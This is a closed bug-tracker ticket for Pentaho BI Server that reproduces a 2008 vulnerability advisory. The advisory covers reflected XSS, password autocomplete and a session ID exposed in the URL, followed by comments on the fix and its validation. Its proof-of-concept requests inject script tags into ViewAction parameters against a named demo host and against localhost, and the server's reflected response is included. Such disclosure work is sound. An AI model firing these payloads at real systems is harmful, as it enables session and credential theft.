Details

    • Type: Bug Bug
    • Status: Closed
    • Severity: Medium Medium
    • Resolution: Fixed
    • Affects Version/s: 1.7.0.GA
    • Fix Version/s: 3.5.0 GA
    • Component/s: None
    • Labels:
      None
    • Notice:
      When an issue is open, the "Fix Version/s" field conveys a target, not necessarily a commitment. When an issue is closed, the "Fix Version/s" field conveys the version that the issue was fixed in.

      Description

      Pentaho 1.7.0.1062 Multiple Vulnerabilities

      Name Multiple Vulnerabilities in Pentaho
      Systems Affected Pentaho <= 1.7.0.1062
      Severity High
      Impact (CVSSv2) High 7/10, vector: (AV:N/AC:L/Au:S/C/I:C/A)
      Vendor http://www.pentaho.com
      Advisory http://antisnatchor.com/xxxx.txt
      Authors Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com)

      Date 20081224

      I. BACKGROUND
      Pentaho Analysis puts rich, analytic power in the hands of your business users
      helping them gain the insights and understanding they need to make optimal
      business decisions.

      II. DESCRIPTION

      Multiple vulnerabilities exist in Pentaho .

      III. ANALYSIS

      Summary:

      A) Reflected XSS
      B) Password field with autocomplete enabled
      C) Disclosure of Session Tokens in URL

      A) Reflected XSS

      The presence of the Cross Site Scripting plague has been veryfied on
      /pentaho/ViewAction parameters. The attacker-supplied code can perform
      different actions, such as stealing the victim's session token or login credentials,
      performing arbitrary actions on the victim's behalf, and logging their keystrokes.
      Users can be induced to issue the attacker's crafted request in various ways.
      For example, an attacker can send to the victim a link containing a malicious URL in
      an email or instant message, instead of submit the link to popular web applications
      that don't escape HTML characters such as <>'().

      An example is the following:

      GET /pentaho/ViewAction?&outputType=khgj345<script>alert('Pwnd')</script>kjh3535
      &solution=opentaps&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis HTTP/1.0
      User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
      Host: demo1.opentaps.org:8181
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg,
      image/gif, image/x-xbitmap, /;q=0.1
      Accept-Language: it-IT,it;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      Referer: http://demo1.opentaps.org:8181/pentaho/ViewAction?solution=opentaps&path=
      Customer%20Analysis&action=CustomerLifeTimeOrders.xaction
      Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
      Cookie2: $Version=1
      Proxy-Connection: Keep-Alive

      When the request will be executed, a popup showing the string Pwnd can be seen.
      Here the response:

      HTTP/1.1 200 OK
      Server: Apache-Coyote/1.1
      X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
      date=200707131605)/Tomcat-5.5
      content-disposition: inline;filename=Customer_Lifetime_Orders.html
      Content-Type: text/html;charset=UTF-8
      Content-Length: 1615
      Date: Wed, 24 Dec 2008 09:55:32 GMT
      Connection: close

      <html><head><title>Pentaho BI Platform - Error in Action</title><link rel="stylesheet"
      type="text/css" href="/pentaho-style/active/default.css"></head><body dir="LTR"><table
      cellspacing="10"><tr><td class="portlet-section" colspan="3">Failed<hr size="1"/></td>
      </tr><tr><td class="portlet-font" valign="top"><span style="color:red">
      Errore: SecureFilterComponent.ERROR_0001 - "khgj345<script>alert('Pwnd')</script>kjh3535"
      non è una selezione consentita "outputType" per questo utente
      (org.pentaho.plugin.core.SecureFilterComponent)</span><p/>Debug: Partenza dellesecuzione di

      {0}/{1}/{2} (org.pentaho.core.solution.SolutionEngine)<br/>Debug: Lettura del contesto a
      runtime e dei dati (org.pentaho.core.solution.SolutionEngine)<br/>Debug: Caricamento del
      file di configurazione dell'Action Sequence (org.pentaho.core.solution.SolutionEngine)<br/>
      Debug: Audit: instanceId=0113b013-d1a1-11dd-a254-65c8cd8ab409,
      objectId=org.pentaho.core.runtime.RuntimeContext, messageType=action_sequence_start
      (org.pentaho.core.runtime.RuntimeContext)<br/>Errore: SecureFilterComponent.ERROR_0001
      - "khgj345<script>alert('Pwnd')</script>kjh3535" non è una selezione consentita "outputType"
      per questo utente (org.pentaho.plugin.core.SecureFilterComponent)<br/>Errore:
      RuntimeContext.ERROR_0012 - LActionDefinition per {0}

      non è stata eseguita con successo
      (org.pentaho.core.runtime.RuntimeContext)<br/>Errore: SolutionEngine.ERROR_0007 -
      Esecuzione dell'Action Sequence fallita (org.pentaho.core.solution.SolutionEngine)<br/></td>
      </tr></table><p>  [it_41] Server Version Pentaho BI Platform 1.7.0.1062</body></html>

      The same servlet, /pentaho/ViewAction, contains other two parameters that are vulnerable to reflected
      XSS: "action" and "path" (that are exploitable in the same way).

      B) Password field with autocomplete enabled

      The response to this request:

      GET /pentaho/Login;jsessionid=857E0C182994F71355BE8A3860539BH7

      contains the login form where credentials are passed to the application.
      [...]
      <tr>
      <td colspan="2"><input type='password' name='j_password' size="30" ></td>
      </tr>
      [...]

      The problem is that the autocomplete tag is not set to OFF. We recommend it,
      especially for the presence of reflected XSS that in this situation can be exploited
      to retrieve the password input from the browser history.

      C) Disclosure of Session Tokens in URL
      The web application session identifier, JSESSIONID, is disclosed in the URL:
      that's a bad practice because these sensitive informations will be visible
      in the client browser history, in the Referer header, in bookmarks.

      An example:
      http://demo1.opentaps.org:8181/pentaho/Login;jsessionid=857E0C18 2994F71355BE8A38605396B1

      IV. DETECTION

      1.7.0.1062 and earlier versions are vulnerable.

      V. WORKAROUND

      Proper input validation and session management will fix the vulnerabilities.

      VI. VENDOR RESPONSE

      No fix available.

      VII. CVE INFORMATION

      No CVE at this time.

      VIII. DISCLOSURE TIMELINE

      20081224 Initial vendor contact
      20081229 Second vendor contact

      IX. CREDIT

      Michele "euronymous" Orru'

      X. LEGAL NOTICES

      Copyright (c) 2008 Michele "euronymous" Orru'

      Permission is granted for the redistribution of this alert
      electronically. It may not be edited in any way without mine express
      written consent. If you wish to reprint the whole or any
      part of this alert in any other medium other than electronically,
      please email me for permission.

      Disclaimer: The information in the advisory is believed to be accurate
      at the time of publishing based on currently available information. Use
      of the information constitutes acceptance for use in an AS IS condition.
      There are no warranties with regard to this information. Neither the
      author nor the publisher accepts any liability for any direct, indirect,
      or consequential loss or damage arising from use of, or reliance on,
      this information.

        Issue Links

          Activity

          Hide
          Bill Seyler added a comment -

          Partially fixed.

          Case where the <script> tag was executing has been fixed.

          Case where autocomplete is available for password field is fixed.

          ID in the URL has not been fixed but now has it's own case (BISERVER-3245)

          Show
          Bill Seyler added a comment - Partially fixed. Case where the <script> tag was executing has been fixed. Case where autocomplete is available for password field is fixed. ID in the URL has not been fixed but now has it's own case ( BISERVER-3245 )
          Hide
          Michele Orru' added a comment -

          I'm following responsible disclosure...
          So after 6 months I've published an entry on my security research website.

          http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/

          Thanks

          :::Michele Orru':::
          Network & Security Manager, IntegratingWeb.com
          http://www.integratingweb.com

          Show
          Michele Orru' added a comment - I'm following responsible disclosure... So after 6 months I've published an entry on my security research website. http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/ Thanks :::Michele Orru'::: Network & Security Manager, IntegratingWeb.com http://www.integratingweb.com
          Hide
          Jared Pshedesky (Inactive) added a comment -

          Reassigning to Greymatter Bucket for validation.

          Show
          Jared Pshedesky (Inactive) added a comment - Reassigning to Greymatter Bucket for validation.
          Hide
          Greymatter Bucket added a comment -

          To test the vulnerabilities present in the Pentaho Bi-Server, we carried out simple tests.

          According to the JIRA, Pentaho Bi-Server is not able to handle the dangerous HTML characters like <>'().
          To test this behavior we modified the url, generated by the Bi-Server for a particular xaction, and injected the <script> element to show an alert message. Following is the sample of the modified url we tested on the Bi-Server:

          http://localhost:8080/pentaho/ViewAction?solution=steel-wheels&path=reports<script>alert('Hi')</script>&action=invoice.xaction

          On executing this script, we did not get any pop-up. According to the JIRA, we should get a pop-up.

          Please confirm if we are moving in the right direction. If not, I would request you to please provide a reproduction path for this JIRA.

          Show
          Greymatter Bucket added a comment - To test the vulnerabilities present in the Pentaho Bi-Server, we carried out simple tests. According to the JIRA, Pentaho Bi-Server is not able to handle the dangerous HTML characters like <>'(). To test this behavior we modified the url, generated by the Bi-Server for a particular xaction, and injected the <script> element to show an alert message. Following is the sample of the modified url we tested on the Bi-Server: http://localhost:8080/pentaho/ViewAction?solution=steel-wheels&path=reports <script>alert('Hi')</script>&action=invoice.xaction On executing this script, we did not get any pop-up. According to the JIRA, we should get a pop-up. Please confirm if we are moving in the right direction. If not, I would request you to please provide a reproduction path for this JIRA.
          Hide
          Marc Batchelor added a comment -

          Validated in CITRUS nightly 9/18

          Show
          Marc Batchelor added a comment - Validated in CITRUS nightly 9/18

            People

            • Assignee:
              Jared Pshedesky (Inactive)
              Reporter:
              Michele Orru'
            • Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: